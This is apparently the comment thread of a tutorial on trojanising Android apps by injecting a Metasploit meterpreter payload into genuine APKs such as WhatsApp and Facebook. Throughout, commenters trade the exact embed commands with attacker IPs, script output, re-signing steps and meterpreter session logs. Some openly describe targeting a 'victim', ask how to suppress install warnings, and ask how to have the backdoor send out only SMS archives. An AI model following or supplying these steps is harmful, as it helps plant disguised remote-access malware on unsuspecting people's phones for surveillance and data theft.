How To: Embed a Metasploit Payload in an Original .Apk File

Im a little confuse about when and how to edit the android manifest file.

When i run the command and create the payload i get a sort of error like you said in your tutorial, but it created a payload.apk file in my root directory.

Tell me if im right,
I need to :
-Decompile the payload.apk with apktool
-edit the android manifest file
-recompile the app with apktool

Also when i go to root/original and try to open with gedit the androidmanifest file it doesnt open correctly

If im not on the good track could you help, otherwise if what i said sound ok i will be fine.
Thanks

To be clear, you don't actually need to decompile and recompile the apk, the script automatically does that. And also you don't have to edit the AndroidManifest.xml file, you just have to open the file and look for the correct Activity name.

Can you tell me what error the script is throwing? That would clarify what kind of problem are you facing.

And also, the AndroidManifest.xml file will be different for every app, so you don't have to worry if yours doesn't look like the screenshot I posted.

Ok well i don't get the option to choose where to hook the payload like in your screenshot,that's what i get:

root@xorion:~# ruby apk-embed-payload.rb Nova\ Launcher\ Prime\ v4.2.0\ .apk -p android/meterpreter/reversetcp LHOST=1........LPORT=4444

* Generating msfvenom payload..
* Signing payload..
cp: target 'original.apk' is not a directory
* Decompiling orignal APK..
Input file (/root/original.apk) was not found or was not readable.
* Decompiling payload APK..

apk-embed-payload.rb:190:in `initialize': No such file or directory @ rbsysopen - original/AndroidManifest.xml (Errno::ENOENT)

from apk-embed-payload.rb:190:in `open'
from apk-embed-payload.rb:190:in `<main>'
root@xorion:~#

Forget about the missing lhost ip , i just removed it to post here.

It looks like the script couldn't find the apk file you wanted to embed the payload into. You can try to copy the apk to the root folder and then run the command:

ruby apk-embed-payload.rb apkname.apk -p android/meterpreter/reverse_tcp LHOST=ipaddress LPORT=4444

What is the name of the apk file you're using?

nova launcher

From the error it' clear that the script is thinking that you're passing multiple files to it. Make sure that there's no slash and/or space in the filename. You can just rename it to something simple and them run the command.

I suggest you do this: Rename the nova launcher apk to 'app.apk' and then run the command -
ruby apk-payload-embedder.rb app.apk -p android/meterpreter/reverse_tcp LHOST=yoour_ip LPORT=4444

Ok, i got it working exept for the part when i test the apk and try to install it.
I get the error when i try to install it it tells me error analysing the packet.
You don't need to sign the apk afterwards?

The script does all that by itself, so it shouldn't be a problem. Maybe you can try with another apk and see if it works.

Well i tried with a 3rd app and this one i didn't need to change anything to the hook point, but still, same error "error analysing the packet" when i try to install it.

I tried with different android file manager but same thing.

You've probably checked it already, but still, can you install those original apks, without embedding the payload? And also you can try to embed other payloads like reverse_https and see if that works.

I tried with another app but same problem could it be the hook point?

Ok i will try with another app, because i tested on 2 phones and same thing.
And i'm pretty sure i placed the hook at the right place.

i got no error with using script but after apk is created when i install in it says
"App not installed"
"The pachage appears to be corrupted"
any solution?? Thankx!!!

hi

when I put my command (ruby apk-embed-payload.rb apkname.apk -p android/meterpreter/reversetcp LHOST=ipaddress LPORT=4444) the terminal displays me the apktool command options.

Also, when I can't find the AndroidManifest.xml file

Tell me exactly what error message is it giving. Copy and paste it here.
And also, Have you installed the lastest apktool from the link I gave in the post?

Getting this error
ruby: No such file or directory -- apk-payload-embedder.rb (LoadError)
and i have ruby installed

If you didn't save the script in the root folder then you have to supply the full path to the script as the argument.
Enter ruby /path_to_script/apk-payload-embedder.rb ...[the remaining command]

Sorry, I put the command wrong in the post. The file name would be "apk-embed-payload.rb".

Hello, and firstly, thanks for a great post.
I've got an error that simply states "No Jarsigner". What should I do to fix this?

Ninja243

You may have to install the latest java

hi...
i do exactly what bro do
but i fail to install the apk to the phone
may i know what happen?

What error is it giving when you are trying to install the apk?

the backdooredapk dint hav meta INF folder which i cant install the apk to the phone

Is there a way to embed the payload to a service? Which constantly runs?

Whenever I enter this
ruby apk-embed-payload.rb WhatsApp.apk -p android/meterpreter/reversetcp LHOST=192.168.0.104 LPORT=4895
This happens
Apktool v1.5.2 - a tool for reengineering Android apk files
Copyright 2010 Ryszard Wisniewski <brut.alll@gmail.com>
with smali v1.4.1, and baksmali v1.4.1
Updated by @iBotPeaches <connor.tumbleson@gmail.com>
Apache License 2.0 (http://www.apache.org/licenses/LICENSE-2.0)

Usage: apktool -q|--quiet OR -v|--verbose COMMAND ...

COMMANDs are:

decode OPTS <file.apk> <dir>
Decode <file.apk> to <dir>.

OPTS:

-s, --no-src
Do not decode sources.
-r, --no-res
Do not decode resources.
-d, --debug
Decode in debug mode. Check project page for more info.
-b, --no-debug-info
Baksmali -- don't write out debug info (.local, .param, .line, etc.)
-f, --force
Force delete destination directory.
-t <tag>, --frame-tag <tag>
Try to use framework files tagged by <tag>.
--frame-path <dir>
Use the specified directory for framework files
--keep-broken-res
Use if there was an error and some resources were dropped, e.g.:
"Invalid config flags detected. Dropping resources", but you
want to decode them anyway, even with errors. You will have to
fix them manually before building.

build OPTS <app_path> <out_file>
Build an apk from already decoded application located in <apppath>.

It will automatically detect, whether files was changed and perform
needed steps only.

If you omit <apppath> then current directory will be used.
If you omit <outfile> then <apppath>/dist/<nameoforiginal.apk>
will be used.

OPTS:

-f, --force-all
Skip changes detection and build all files.
-d, --debug
Build in debug mode. Check project page for more info.
-a, --aapt
Loads aapt from specified location.

if|install-framework <framework.apk> <tag> --frame-path <location>
Install framework file to your system.

For additional info, see: http://code.google.com/p/android-apktool/
For smali/baksmali info, see: http://code.google.com/p/smali/
What should I do?

Plus On, @ Jamell, I have exactly the same problem...

Have you found out the problem?

What are we missing?

Cheers

Ok so I saw the mistake. Its from when you have installed APKTOOL.

follow these instructions again and it will work:

Linux:

Download Linux wrapper script (Right click, Save Link As apktool)
Download apktool-2 (find newest here)

Make sure you have the 32bit libraries (ia32-libs) downloaded and installed by your linux package manager, if you are on a 64bit unix system.

(This helps provide support for the 32bit native binary aapt, which is required by apktool)

Focus on this part! Thats where i went wrong...

Rename downloaded jar to apktool.jar
Move both files (apktool.jar & apktool) to /usr/local/bin (root needed)
Make sure both files are executable (chmod +x)
Try running apktool via cli

hey,
whenever i enter the command above to run the script it simply displays the apktool menu and nothing else.
what should i do?
here's what it looks like

root@aaronstoneuk:~# ruby apk-embed-payload.rb /root/wps.apk -p android/meterpreter/reversetcp LHOST=192.168.1.11 LPORT=4895

• Apktool version 22:05:42 up 53 min, 1 user, load average: 0.47, 0.56, 0.51

USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty2 :1 21:13 52:50 11:43 4:36 iceweasel
Apktool v2.1.1-dirty - a tool for reengineering Android apk files
with smali v2.1.2-dev and baksmali v2.1.2-dev
Copyright 2014 Ryszard Wisniewski <brut.alll@gmail.com>
Updated by Connor Tumbleson <connor.tumbleson@gmail.com>

usage: apktool
-advance,--advanced prints advance information.
-version,--version prints the version then exits
usage: apktool if|install-framework options <framework.apk>
-p,--frame-path <dir> Stores framework files into <dir>.
-t,--tag <tag> Tag frameworks using <tag>.
usage: apktool decode options <fileapk>
-f,--force Force delete destination directory.
-o,--output <dir> The name of folder that gets written. Default is apk.out
-p,--frame-path <dir> Uses framework files located in <dir>.
-r,--no-res Do not decode resources.
-s,--no-src Do not decode sources.
-t,--frame-tag <tag> Uses framework files tagged by <tag>.
usage: apktool build options <apppath>
-f,--force-all Skip changes detection and build all files.
-o,--output <dir> The name of apk that gets written. Default is dist/name.apk
-p,--frame-path <dir> Uses framework files located in <dir>.

For additional info, see: http://ibotpeaches.github.io/Apktool/
For smali/baksmali info, see: https://github.com/JesusFreke/smali
not supported, please download the latest 2. version from git.
ps: i have all the libraries installed.
Any help is appreciated.

Hi Skulltech,

When I run the command I get this error...

* Generating msfvenom payload..
* Signing payload..
* Decompiling orignal APK..
* Decompiling payload APK..
Exception in thread "main" brut.androlib.AndrolibException: Could not decode arsc file
at brut.androlib.res.decoder.ARSCDecoder.decode(ARSCDecoder.java:52)
at brut.androlib.res.AndrolibResources.getResPackagesFromApk(AndrolibResources.java:538)
at brut.androlib.res.AndrolibResources.loadMainPkg(AndrolibResources.java:63)
at brut.androlib.res.AndrolibResources.getResTable(AndrolibResources.java:55)
at brut.androlib.Androlib.getResTable(Androlib.java:64)
at brut.androlib.ApkDecoder.setTargetSdkVersion(ApkDecoder.java:209)
at brut.androlib.ApkDecoder.decode(ApkDecoder.java:92)
at brut.apktool.Main.cmdDecode(Main.java:165)
at brut.apktool.Main.main(Main.java:81)
Caused by: java.io.IOException: Expected: 0x00000008, got: 0x00000000
at brut.util.ExtDataInput.skipCheckShort(ExtDataInput.java:56)
at brut.androlib.res.decoder.ARSCDecoder.readValue(ARSCDecoder.java:238)
at brut.androlib.res.decoder.ARSCDecoder.readEntry(ARSCDecoder.java:201)
at brut.androlib.res.decoder.ARSCDecoder.readConfig(ARSCDecoder.java:189)
at brut.androlib.res.decoder.ARSCDecoder.readType(ARSCDecoder.java:157)
at brut.androlib.res.decoder.ARSCDecoder.readPackage(ARSCDecoder.java:114)
at brut.androlib.res.decoder.ARSCDecoder.readTable(ARSCDecoder.java:78)
at brut.androlib.res.decoder.ARSCDecoder.decode(ARSCDecoder.java:47)
... 8 more
* Locating onCreate() hook..
* Copying payload files..
* Loading original/smali/com/snapchat/android/LandingPageActivity.smali and injecting payload..
* Poisoning the manifest with meterpreter permissions.._

apk-embed-payload.rb:79:in `initialize': No such file or directory @ rbsysopen - payload/AndroidManifest.xml (Errno::ENOENT)

from apk-embed-payload.rb:79:in `open'
from apk-embed-payload.rb:79:in `fixmanifest'
from apk-embed-payload.rb:225:in `<main>'_

Can you spot the problem at all?

Cheer mate!

SOLVED: Install the latest APKTOOL's..

ruby apk-embed-payload.rb app.apk -p android/meterpreter/reversetcp LHOST=105.225.26.184 LPORT=53000
* Generating msfvenom payload..
* Signing payload..
* Decompiling orignal APK..

Exception in thread "main" brut.androlib.AndrolibException: brut.directory.DirectoryException: java.util.zip.ZipException: error in opening zip file

at brut.androlib.ApkDecoder.hasResources(ApkDecoder.java:282)
at brut.androlib.ApkDecoder.decode(ApkDecoder.java:90)
at brut.apktool.Main.cmdDecode(Main.java:165)
at brut.apktool.Main.main(Main.java:81)
Caused by: brut.directory.DirectoryException: java.util.zip.ZipException: error in opening zip file
at brut.directory.ZipRODirectory.<init>(ZipRODirectory.java:55)
at brut.directory.ZipRODirectory.<init>(ZipRODirectory.java:38)
at brut.androlib.res.util.ExtFile.getDirectory(ExtFile.java:55)
at brut.androlib.ApkDecoder.hasResources(ApkDecoder.java:280)
... 3 more
Caused by: java.util.zip.ZipException: error in opening zip file
at java.util.zip.ZipFile.open(Native Method)
at java.util.zip.ZipFile.<init>(ZipFile.java:215)
at java.util.zip.ZipFile.<init>(ZipFile.java:145)
at java.util.zip.ZipFile.<init>(ZipFile.java:159)
at brut.directory.ZipRODirectory.<init>(ZipRODirectory.java:53)
... 6 more
* Decompiling payload APK..

apk-embed-payload.rb:190:in `initialize': No such file or directory @ rbsysopen - original/AndroidManifest.xml (Errno::ENOENT)

from apk-embed-payload.rb:190:in `open'
from apk-embed-payload.rb:190:in `<main>'
help please

here's screenshot.

When I tried installing that cocbackdoored.apk in my android device running lollipop, it gave the error "There's a problem parsing the package"

When I signed this cocbackdoored.apk following step6 on https://null-byte.wonderhowto.com/how-to/make-your-malicious-android-app-be-more-convincing-0163730/

The signed apk did install but I can't get a meterpreter session from it.

I've also tried the above with Lhost=(my external IP). But still no meterpreter session.

Any help?

this is how i get when i follow you

just drag and drop the ruby file and APK file into terminal window!

BINGO!

When I followed the steps on this page with whatsapp original apk and then signed the produced "whatsappbackdoor.apk" following step6 on https://null-byte.wonderhowto.com/how-to/make-your-malicious-android-app-be-more-convincing-0163730/

It installed on my device and also gave me a meterpreter session. So, finally thank you so much for this tutorial. But, one question though(regarding my above/previous comment). Can you tell why didn't it work with the Clash of Clans original apk?

• Could you guys please create a video on how to do this?

i could not find the package.. suggest me further.. thanks in advance

Azar,

Leave this step.
Look at my screenshot above, and do that first of all.

Then, follow the step6 on this page https://null-byte.wonderhowto.com/how-to/make-your-malicious-android-app-be-more-convincing-0163730/

After you have signed the apk, It'll install without any problems.

hi Eshan... i have more doubts... can i ask you ?

I had problems running the apk. could not install on phone. i had too resign it with this tool

https://dl.dropboxusercontent.com/s/c1y9jdort15h7p4/sign.zip

place all of the files into a folder. and your apk then go too this folder in cmd
and run this command.
java -jar signapk.jar certificate.pem key.pk8 yourapkname.apk signedapkname.apk

Cant find the source of the website i got this from. might have been the original poster. sorry!

And i also think if this script runs itself it does not allways attache to the right attribute, i did try this on WAN and got a randon ip what looked like the ip of the app server. and dropped connection. very unskilled at this could somebody explain?

Ive been trying to get it running on my phone (over WAN) while using mobile internet. Got following messages all the time and can only run core commands in the short amount of time I get, before the session closes.

msf exploit(handler) > exploit

• Handler failed to bind to XXX.XXX.XXX.XXX:8080:- -

Started reverse TCP handler on 0.0.0.0:8080
* Starting the payload handler...
* Sending stage (60830 bytes) to XXX.XXX.XXX.XXX
* Meterpreter session 5 opened (192.168.178.26:8080 -> 80.187.102.58:5529) at 2016-01-15 00:24:31 +0000
* Sending stage (60830 bytes) to XXX.XXX.XXX.XXX

meterpreter >

• Meterpreter session 5 is not valid and will be closed

* XXX.XXX.XXX.XXX - Meterpreter session 5 closed.

Is it a bad internet connection of my mobile or somthing else?

Pls help

thanks in advance

I'm also recently facing that problem, didn't face it before. Maybe it's because of a recent Metasploit update, I'm not sure. i will look into it.

link is disabled , reupload please ? thanks alot .

Thanks for letting me know about that, I've updated the link. ;)

about the Meterpreter session closed error on cellular network you can use metasploit v4.11.1

Allright SKullTech, I understood everything. But I was wondering (excuse my ignorance; I'm new to all this) why the ruby script (that you mentioned in step 2) already contains these payloads code?

//

unless(apkfile && File.readable?(apkfile))
puts "Usage: #{$0} target.apk msfvenom options\n"
puts "e.g. #{$0} messenger.apk -p android/meterpreter/reversehttps LHOST=192.168.1.1 LPORT=8443"
exit(1)

//

cause if you write something stupid, this EXAMPLE show you how to do it good

Friend I am Not able to download the file(ruby script) the file has been remove can you help me out

hi

I follow your tutorial and every thinks work fine.but when i want embed payload to telegram messenger i get some error.

this is a telegram messenger link from playe store
https://play.google.com/store/apps/details?id=org.telegram.messenger

i must paste payload code to the lunchactivity.smali but there is 15 number of this file.

this is my orginal file AndroidManifest.xml

and this is LunchActivity.smali but i find 4 onCreate method

finaly when i run script and choos LunchActivity.smali(number 39) insted of hook i get this error.

A way for lazies people via Ruby script

I choose a lazy person to do a hard job. Because a lazy person will find an easy way to do it

This script is a POC for injecting metasploit payloads on arbitrary APKs
Authored by timwr, Jack64 , Updated by xC0d3rZ
The Script
Enjoy.

Usage

apk-embed-payload.rb {target.apk} {msfvenom options}

e.g. apk-embed-payload.rb messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443

To easy ..

The link of the script you posted is unavailable!

https://github.com/xc0d3rz/metasploit-apk-embed-payload/

Hi SkullTech

I embed the payload/trojan into the original apk which in my case it's ADM.apk then sign it , after I install the apk it works properly and as long as the android device is connected to WiFi I can do everything from msfconsole like downloading or webcamsnap or dumpsms etc. but when I turn off the wifi and turn the mobile data on ( I set it on 2G because the victim that I want to install the apk on his phone has 2G!!!!! and I want everything to be the same as his situation) in my msfconsole I just can do the core commands like "run" and if I try all the other commands it will say something like :

Unknown command: ls
Unknown command: pwd
I just can get his ip. but the problem is when I locate him it shows the wrong location.
what should I do to make the other commands work properly on mobile data like they work properly on WiFi?
I appreciate your answers. Thanks

hi guys
when i want to install embed apk file in my phone i get this popup message,is there anyway to not showing this?

hi, i tried to rebuilding infectedapk like as you. but, when i instal that, aplication get force close. i triedwith whatsapp and b612 but it's same get error force close. do you know why ? please help me. thanks

Hello,

I tried somethings yesterday and I fixed the problem by resigning the Backdoored apk file, you can Download this file :
https://1fichier.com/?gab9hu1ges

if you don't have Java in Kali Linux,before you can install apksign with the terminal :
apt-get install apksign

when the apksign zip file is downloaded you can unzip it and then go to the folder in the terminal :
cd /root/Downloads/ApkSign/ and after that resign the backdoored apk file:
apksign certificate.pem key.pk8 /input/ /output/

eg : apksign certificate.pem key.pk8 /root/Downloads/Facebookbackdoored.apk /root/Downloads/ResignedFacebook.apk

Now, you can install the apk file in the phone and each time the application is opened, you have a meterpreter command line.

This fix is 100% functional. Hope it can help you too.

Ok Buno i will try this afternoon and report back to results, i also get the same issue when try to run the .apk on the tablet or phone "error while parsing". Everything went beautifully for me on the tutorial ..the script did it all but still unable to install the .apk

hi when i compile the original Apk i have this message:

..\3-Out\com.facebook.lite.apk\smali\com\facebook\lite\MainActivity.smali521,4 Invalid register: v22. Must be between v0 and v15, inclusive.

..\3-Out\com.facebook.lite.apk\smali\com\facebook\lite\MainActivity.smali522,4 Invalid register: v22. Must be between v0 and v15, inclusive.

Exception in thread "main" brut.androlib.AndrolibException: Could not smali file: com/facebook/lite/MainActivity.smali
at brut.androlib.src.SmaliBuilder.buildFile(SmaliBuilder.java:71)
at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:55)
at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:41)
at brut.androlib.Androlib.buildSourcesSmali(Androlib.java:349)
at brut.androlib.Androlib.buildSources(Androlib.java:289)
at brut.androlib.Androlib.build(Androlib.java:275)
at brut.androlib.Androlib.build(Androlib.java:250)
at brut.apktool.Main.cmdBuild(Main.java:225)
at brut.apktool.Main.main(Main.java:84)

the error is this line : invoke-static {p0}, Lcom/metasploit/stage/Payload;->startService(Landroid/content/Context;)V
plz how can solv

Hi

>Injected payload to cc cleaner using apk-embed-payload.rb
>Signed!! using apk-sign
>Installed well on Android 6.0 Marshmallow!!
>>>Tried to open the app but it's crashing with general error. "Unfortunately, CC cleaner has stopped."

Tried with others apps also like facebook Lite, Calculator etc.. n it throws same error !!
What went wrong.???
Thanks in advance!!

UPDATE: This post is outdated, the latest version with the correct links and updated instructions can be found UPDATE: This post is outdated, the latest version with the correct links and updated instructions can be found at my blog, here - at my blog, here - https://techkernel.wordpress.com/2015/12/11/embed-metasploit-payload-in-apk-easily/

i got apk file but when i tried to install it says there was a problem parsing the package

last link is no working

during installation every thing went fine.but there is not backdoor.apk file saved in folder .any help?

is there anyway to customize permissions. for example i only need my backdoor send sms archive to me i dont any other thing to do.

I did everything as it's instructed but getting two apks at the end of the process and i can't install lib32 files because i have 64bit OS what to do? if i have to do all manually. it's says that i get the backdoorapp.apk but i'm getting original.apk and payload . apk that's what you do with apktool to decompile apks. what step i'm missing or what should i do to get full backdoored apk autometically

thank

please help me

can anyone tell me am struct in Unable to find hook point

which one should i choose to create hook

plss tell me guys how to fix this

what should i do?
#please help me